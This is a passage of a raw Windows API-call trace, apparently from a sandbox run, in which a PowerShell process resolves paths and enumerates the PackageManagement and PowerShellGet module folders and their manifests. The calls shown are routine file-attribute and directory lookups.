nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4a8) returned 1 [0149.889] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\syswow64\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x5a0d76c | out: lpFileInformation=0x5a0d76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x123dcea, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x496a9b80, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496a9b80, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0149.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4a4) returned 1 [0149.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d764) returned 1 [0149.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.890] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Join-Path.*" (normalized: "c:\\windows\\syswow64\\wbem\\join-path.*"), lpFindFileData=0x5a0d514 | out: lpFindFileData=0x5a0d514*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4bc) returned 1 [0149.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d71c) returned 1 [0149.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4a8) returned 1 [0149.892] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x5a0d76c | out: lpFileInformation=0x5a0d76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4a4) returned 1 [0149.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d764) returned 1 [0149.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.893] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Join-Path.*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\join-path.*"), lpFindFileData=0x5a0d514 | out: lpFindFileData=0x5a0d514*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4bc) returned 1 [0149.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d71c) returned 1 [0149.894] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0d600, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0149.897] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0149.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0149.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0149.898] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.899] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.899] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0149.899] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0149.899] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.899] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.899] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0149.899] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0149.900] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0149.900] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0149.900] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0149.900] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0149.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0149.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0149.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.900] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0149.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.901] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0149.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0149.902] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.902] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.902] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49b46620, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49b46620, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.902] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.902] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.902] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.902] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e8) returned 1 [0149.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7ac | out: lpFileInformation=0x5a0d7ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e4) returned 1 [0149.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2991e6c | out: lpFileInformation=0x2991e6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.903] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0149.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.905] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.905] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0149.905] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.905] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.905] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.905] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.905] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e8) returned 1 [0149.906] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7ac | out: lpFileInformation=0x5a0d7ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e4) returned 1 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.907] GetFileAttributesExW (in: 